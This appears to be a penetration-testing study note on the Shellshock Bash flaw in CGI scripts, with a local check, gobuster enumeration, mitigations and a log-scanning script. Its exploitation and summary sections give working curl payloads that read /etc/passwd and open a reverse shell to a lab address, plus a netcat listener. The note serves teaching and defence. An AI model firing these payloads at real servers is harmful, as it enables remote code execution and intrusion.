# 18. Attacking CGI Applications - Shellshock

### 1. Vulnerability Overview

#### CVE-2014-6271 - Shellshock

* **Description:** A critical vulnerability in Bash that allows arbitrary command execution through manipulated environment variables.
* **Cause:** Bash versions up to **4.3** improperly handle function definitions in environment variables.
* **Impact:** Can lead to **remote code execution** in the context of the web server user, often via CGI scripts.
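The fastest way to tell whether a host is affected is the local one-liner that was widely published with the advisory: export a variable whose value begins with `() {`, start a child Bash, and see whether the text after the function body runs. The wrapper below is an added example for these notes, not code from the original page; it assumes only that `bash` is on the `PATH`.

```shell
# Added example (not from the original notes): local check for CVE-2014-6271.
# An unpatched Bash imports the exported variable as a function and, because of
# the bug, also executes the text after the closing brace, so "vulnerable" is
# printed before "test". A patched Bash prints only "test".
check_shellshock() {
  if ! command -v bash >/dev/null 2>&1; then
    echo "bash not found"
    return 2
  fi
  # The variable name is irrelevant; only the "() {" prefix of the value matters.
  out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
  case "$out" in
    *vulnerable*) echo "VULNERABLE: $(bash --version | head -n 1)"; return 1 ;;
    *)            echo "patched: $(bash --version | head -n 1)";    return 0 ;;
  esac
}

if check_shellshock; then
  echo "exit status: 0"
else
  echo "exit status: $?"
fi
```

The function returns 1 when the host is affected, 0 when Bash is patched, and 2 when no Bash is installed, so it can be dropped into a fleet-wide inventory script and the non-zero hosts triaged for the upgrade in section 4.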

***

### 2. Enumeration

#### Discover CGI Scripts (Gobuster)

Identify potentially vulnerable scripts in the `/cgi-bin/` directory.

```bash
gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi
```

#### Verify CGI Script Accessibility (cURL)

Check for an active CGI script that could be vulnerable.

```bash
curl -i http://10.129.204.231/cgi-bin/access.cgi
```

***

### 3. Exploitation

#### Confirm Vulnerability (cURL)

Inject a **malicious function definition** into the `User-Agent` header to read the `/etc/passwd` file (the two `echo` calls emit the blank line that ends the HTTP headers, so the command output appears in the response body).

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi
```

#### Execute a Reverse Shell (cURL)

Inject a reverse shell payload into the `User-Agent` header.

```bash
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi
```

#### Set Up a Netcat Listener

Start the listener before sending the reverse-shell request, so the connection back to port `7777` is caught.

```bash
sudo nc -lvnp 7777
```

***

### 4. Mitigation

#### Update Bash

Upgrade to a patched Bash version to close the vulnerability.

#### Firewalling

Restrict external access to CGI scripts via firewall rules.

#### Decommission Vulnerable Hosts

If possible, **remove** or replace outdated systems running vulnerable Bash versions.

***

### 5. Key Takeaways

* **Shellshock** is exploited via environment variables, often targeting **CGI scripts**.
* The `User-Agent` header is a common attack vector for injecting payloads.
* **Updating Bash** is the best way to mitigate the vulnerability.
* **Always test only with explicit permission.**
* **Replace IP addresses and ports** with target-specific information.
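Because a CGI server exports request headers as `HTTP_*` environment variables, and a vulnerable Bash only reacts to a value that starts with exactly `() {`, that fixed string is the signature to hunt for in web logs. The script below is an added example for these notes, not code from the original page; the log lines are constructed sample data in Apache "combined" format, and the two functions take any log file path.

```shell
# Added example (not from the original notes): find Shellshock probes in an
# Apache/Nginx "combined" access log. The marker "() {" is exactly the prefix a
# vulnerable Bash looks for, so a fixed-string grep is sufficient.
# The log lines below are constructed sample data, not from a real server.
LOGFILE=$(mktemp)
cat > "$LOGFILE" <<'EOF'
198.51.100.7 - - [24/Sep/2014:10:01:02 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Sep/2014:10:01:05 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 1024 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
203.0.113.5 - - [24/Sep/2014:10:02:17 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 37 "() { :; }; echo vulnerable" "curl/7.38.0"
198.51.100.7 - - [24/Sep/2014:10:03:40 +0000] "GET /index.html HTTP/1.1" 404 196 "-" "Mozilla/5.0"
EOF

# Print every request whose logged header fields carry the marker.
shellshock_hits() {
  grep -F '() {' "$1"
}

# Unique source addresses that sent such requests, one per line.
shellshock_sources() {
  grep -F '() {' "$1" | awk '{ print $1 }' | sort -u
}

echo "Probes found: $(shellshock_hits "$LOGFILE" | wc -l | tr -d ' ')"
shellshock_hits "$LOGFILE"
echo "Sources:"
shellshock_sources "$LOGFILE"

rm -f "$LOGFILE"
```

On the sample data the scan reports two probes from two sources, one carried in `User-Agent` and one in `Referer`. The caveat is that the combined format logs only those two headers: a payload sent in `Cookie` or any other header still reaches the CGI environment but never reaches this log, so a complete picture needs full-header capture (a WAF or reverse-proxy log) rather than the access log alone.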

***

### 6. Commands Summary

```bash
# Gobuster - Discover CGI scripts
gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

# cURL - Verify CGI script accessibility
curl -i http://10.129.204.231/cgi-bin/access.cgi

# cURL - Confirm vulnerability
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi

# cURL - Execute reverse shell
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi

# Netcat listener
sudo nc -lvnp 7777
```
